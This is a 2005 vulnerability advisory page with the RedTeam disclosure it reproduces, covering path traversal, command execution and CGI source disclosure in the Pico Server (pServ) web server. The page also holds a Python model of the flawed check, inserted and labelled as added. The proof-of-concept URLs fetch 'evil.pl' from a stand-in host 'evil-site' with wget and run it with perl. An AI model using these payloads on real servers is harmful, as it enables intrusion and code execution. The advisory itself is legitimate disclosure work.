SecurityTracker.com
SecurityTracker
Archives
Category: Application (Web Server/CGI) > pico Server (pServ)
Vendors: pserv.sourceforge.net
pServ Discloses CGI Source to Remote Users, Lets Remote Users Execute Arbitrary Code, and Lets Local Users View Potentially Privileged Files
SecurityTracker Alert ID:  1013977
SecurityTracker URL:  http://securitytracker.com/id/1013977
CVE Reference: CVE-2005-1365, CVE-2005-1366, CVE-2005-1367
Date:  May 17 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.2; possibly prior versions
Description:   Several vulnerabilities were reported in Pico Server (pServ). A remote user can view the source of CGI scripts. A remote user can execute arbitrary code on the target system. A local user can view files with the privileges of the web server.

The server does not properly protect against directory traversal attacks. If pServ on the target system has been compiled with CGI-BIN support, then a remote user can supply a specially crafted URL to execute arbitrary programs on the target system [CVE: CVE-2005-1365]. The code will run with the privileges of the pServ process.

A demonstration exploit URL to invoke 'wget' to load 'evil.pl' to the target system is provided:

http://[target]:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl

A demonstration exploit URL to subsequently invoke the 'evil.pl' script is provided:

http://[target]:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl

A remote user can supply a specially crafted URL to view the source of CGI scripts in the 'cgi-bin' directory [CVE: CVE-2005-1366]. A demonstration exploit URL to access the source of the 'test.pl' script is provided:

http://[target]:2000/somedir/../cgi-bin/test.pl

The web server does not differentiate between files and symbolic links [CVE: CVE-2005-1367]. A local user with access to a web server directory can create a symbolic link from a critical file on the system to a file in the web server directory. Then, the user can access the web server to view the file with the privileges of the pServ process.

The vendor was notified on May 2, 2005.

Claus R. F. Overbeck of RedTeam at the Laboratory for Dependable Distributed Systems at RWTH-Aachen University reported these vulnerabilities.

Impact:   A remote user can view the contents of CGI scripts.

A remote user can execute arbitrary code on the target system with the privileges of the pServ process.

A local user can view files on the target system with the privileges of the pServ process.

Solution:   The vendor has issued a fixed version (3.3) for the remote vulnerabilities, available at:

http://sourceforge.net/project/showfiles.php?group_id=59378

The vendor does not plan to issue a fix for the local vulnerability.

Vendor URL: sourceforge.net/projects/pserv
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Pico Server (pServ) Remote Command Injection


            Advisory: Pico Server (pServ) Remote Command Injection

RedTeam found a remote command injection in Pico Server (pServ) which results
in a remote attacker being able to issue arbitrary commands on the server.

Details
=======

Product: Pico Server (pServ)
Affected Version: 3.2 (verified), <=3.2 probably too
Immune Version: 3.3
OS affected: all
Security-Risk: very high
Remote-Exploit: yes
Vendor-URL: http://pserv.sourceforge.net/
Vendor-Status: new version available
Advisory-URL: http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010
Advisory-Status: published
CVE: CAN-2005-1365
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365)


Introduction
============
From http://pserv.sourceforge.net/
Pico Server is a small web server. It is meant to be portable and
configurable.

* small, portable
* fast
* CGI-BIN support
* auto-indexing of directories
* access and error logging (see p-reporter for an analyzer)
* forking or single-connection at choice

Pico Server (pServ) is written in portable C (K&R style so it can compile on
older compilers too) and sports several options that by means of #define
statements can customize the behavior, the performance and the feature set so
as to be able to fit the requisites better.

If pServ is compiled with support for CGI-BIN a remote attacker is able to
execute any program (with pServ permissions) on the server by traversing out
of the cgi-bin directory.

More Details
============

pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated as
cgi-scripts.
To prevent a user from traversing out of the cgi-bin using the traditional /../,
pServ parses the requested URL. It increases a counter by one if it parses a
/ (new subdir) and decreases the counter if it parses /../. If the counter
goes below zero the URL is rejected as illegal. Unfortunately an attacker can
avoid being rejected just by using enough / in the URL (without directory
names between them), so he can traverse out of the cgi-bin by adding some
/../ . This lets the attacker execute any program on the server (with pServ
permissions).
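To make the counter flaw concrete, here is an added Python model (not pServ's source, which the advisory does not quote) of the depth check as the advisory describes it, beside a segment-based check that canonicalizes the path before classifying it; the second check also covers the somedir/../cgi-bin source-disclosure case from the SecurityTracker summary above. The function names and the exact counting rules are assumptions reconstructed from the text.

```python
from typing import List, Optional
from urllib.parse import unquote


def flawed_depth_check(path: str) -> bool:
    """Counter check as the advisory describes it (assumed reconstruction,
    not pServ's code): +1 per '/' (new subdir), -1 per '/..'.

    Empty segments produced by '//' still count +1, so a run of slashes
    buys enough credit for the following '/..' steps never to go negative.
    """
    depth = 0
    i = 0
    while i < len(path):
        if path[i] == "/":
            is_dotdot = path.startswith("/..", i) and (
                i + 3 == len(path) or path[i + 3] == "/")
            if is_dotdot:
                depth -= 1
                i += 3
            else:
                depth += 1
                i += 1
            if depth < 0:
                return False        # rejected as illegal
        else:
            i += 1
    return True


def resolve_cgi_path(path: str) -> Optional[str]:
    """Hardened form: canonicalize first, decide afterwards.

    Returns the resolved path if it stays inside cgi-bin, else None.
    Percent-decoding happens before splitting so encoded dots are seen.
    """
    stack: List[str] = []
    for seg in unquote(path).split("/"):
        if seg in ("", "."):
            continue                # '//' and '/./' carry no weight
        if seg == "..":
            if not stack:
                return None         # would climb above the document root
            stack.pop()
            continue
        stack.append(seg)
    if len(stack) < 2 or stack[0] != "cgi-bin":
        return None                 # not a script inside cgi-bin
    return "/".join(stack)
```

Running the padded path from the proof of concept through both functions shows the counter never dipping below zero while the canonicalizing check rejects it on the first `..` past `cgi-bin`.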

Proof of Concept
================

The following url downloads a script (or executable) to the server:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl

This is how the script can be executed afterwards:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl


Workaround
==========

The only workaround is to compile pServ without support for cgi-bin.

Fix
===

The Developers have released Version 3.3. This version should fix the
problem. The changes have not been tested by RedTeam, yet.

Security Risk
=============

The security risk is rated very high because a remote attacker can use this
flaw to execute arbitrary code on the server (with the permissions of pServ).

History
=======

2005-04-29 found
2005-05-02 first attempt to inform developers
2005-05-02 CAN-number assigned
2005-05-04 second attempt to inform developers
2005-05-16 new version released. Advisory published

RedTeam
=======

RedTeam is a penetration testing group working at the Laboratory for
Dependable Distributed Systems at RWTH-Aachen University. You can find more
information on the RedTeam Project at
http://tsyklon.informatik.rwth-aachen.de/redteam/


Copyright 2021, SecurityGlobal.net LLC